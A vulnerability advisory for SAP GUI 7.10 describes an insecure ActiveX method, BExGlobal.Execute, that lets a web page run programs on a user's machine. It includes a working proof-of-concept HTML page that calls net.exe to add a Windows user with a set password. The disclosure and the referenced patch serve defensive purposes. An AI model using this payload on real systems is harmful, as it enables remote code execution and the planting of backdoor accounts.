SAP GUI 7.00 - BExGlobal Active-X unsecure method

ID SSV:68027
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                Security vulnerability found in SAP GUI 7.10 and BI 7.0 that allows operating system functions to be called remotely.

Application: SAP GUI
Versions Affected: SAP GUI (SAP GUI 7.1)
Vendor URL:
Bugs: Insecure method. Code Execution.
Exploits: YES
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of Public Advisory: 23.03.2010
Author: Alexey Sintsov from DSecRG


Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX control component which is a part of SAP GUI.
One of the methods (Execute) can be used to execute files on users system.


Attacker can construct html page which call vulnerable function "Execute" from ActiveX Object BExGlobal.

Example (add user 'don_huan' with password 'p4ssW0rd'):

<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>

<script language='Javascript'>
function init()
DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);


Fix Information
All patches are available since December via note 1407285



Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.